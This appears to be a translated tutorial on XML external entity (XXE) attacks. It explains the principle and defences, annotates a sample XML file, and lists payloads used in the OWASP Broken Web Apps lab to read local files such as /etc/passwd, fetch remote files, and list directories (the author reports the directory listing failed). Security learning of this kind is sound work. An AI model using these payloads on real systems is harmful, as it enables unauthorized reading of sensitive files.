This article is intended for network security learning , please do not do any illegal acts, otherwise you will bear the consequences.
Attack related introduction
introduce:
XXE vulnerabilities occur in applications that use an XML parser to process user-supplied XML input. The attacker triggers the XML parser to load external entities by inserting malicious entity references in user-entered XML documents. These external entities may point to the local file system or to remote resources accessed over the network.
principle:
XML parsers generally support entity references for referencing and reusing defined entities. The principle of the XXE vulnerability is that by inserting malicious entity references in the user's XML input, attackers can read sensitive file content, execute system commands, initiate remote requests, etc. When the parser parses the malicious entity reference, the attacker can obtain the required information through the parser's response.
Instructions:
- Inserting external entity references in XML input: By inserting malicious entity references in the user's XML input, an attacker can read the contents of local files or execute system commands.
- Exploiting remote entities: Attackers can point entity references to XML entities on remote servers to obtain sensitive information about remote resources.
Prerequisites:
- An attacker can submit a crafted malicious XML input to a target application, and the application processes the input using an XML parser.
Defense method:
- Input validation and filtering: Perform strict input validation on XML input submitted by users, filter and remove potentially malicious content.
- Disable Entity Resolution: Disables external entity resolution in the XML parser to prevent loading of malicious entities.
- Use a secure XML processing library: Choose to use a security-audited XML processing library that has fixed the XXE vulnerability.
- Minimize entity references in code: Avoid direct use of entity references in code as much as possible.
Simple XML document example
<?xml version="1.0"?>
<!DOCTYPE note[
<!ENTITY entity-name SYSTEM "URI/URL">
]>
<note>
<to>杰瑞</to>
<from>汤姆</from>
<head>提醒</head>
<body>你是个好人</body>
</note>The following is a description of the line-by-line analysis of the sample source code to help novices understand:
-
<?xml version="1.0"?>: This is the XML declaration part, which indicates that the version number of this XML document is 1.0. -
<!DOCTYPE note[: This is the opening tag of a Document Type Definition (DTD). It specifies that the document is of type "note" and defines the relevant content within square brackets. -
<!ENTITY entity-name SYSTEM "URI/URL">: This is an entity declaration. An entity can represent a value, or it can reference an external resource. Here, "entity-name" is the name of the entity, "SYSTEM" indicates the reference method, and "URI/URL" is the location of the entity reference, which can be the URI or URL address of the file. -
]>: This is the closing tag of the Document Type Definition (DTD). -
<note>: This is the root element of the document, which contains other child elements. -
<to>Dave</to>: This is a sub-element that represents the receiver's information. Its label is "to", and the text content inside the label is "Dave", indicating that the recipient's name is "Dave". -
<from>Tom</from>: This is another sub-element representing the sender's information. Its label is "from", and the text content inside the label is "Tom", indicating that the sender's name is "Tom". -
<head>Reminder</head>: This is the third child element, representing the title of the note. Its label is "head", and the text content in the label is "Reminder", indicating that the title of the note is "Reminder". -
<body>You are a good man</body>: This is the last child element, representing the content of the sticky note. Its label is "body", and the text content in the label is "You are a good man", indicating that the content of the sticky note is "You are a good man". -
</note>: This is the end tag of the root element, used to close the root element.
This sample source code represents a simple note information, including information such as receiver, sender, title and content.
Attack recurrence ( reference )
range
Range I use the range provided in the OWASP_Broken_Web_Apps virtual machine
attack payload
1) Read local files through the file:/// protocol:
# 读取本地F盘下的1.txt文件
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///F:/1.txt">
]>
<foo>&xxe;</foo>read Read sensitive files directly
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
2) Read remote files via HTTP protocol
# 读取远程192.168.100.58主机(我自己电脑的ip,本地ip)的1.txt
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://192.168.100.58/1.txt">
]>
<foo>&xxe;</foo>
3) List the content of the directory: (I also failed to execute this attack statement, just know that there is this thing, and the previous ones are enough for general testing vulnerabilities)
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///etc/">
<!ENTITY % eval "<!ENTITY % directory SYSTEM 'file:///%file;'>">
%eval;
%directory;
]>
<test>&directory;</test>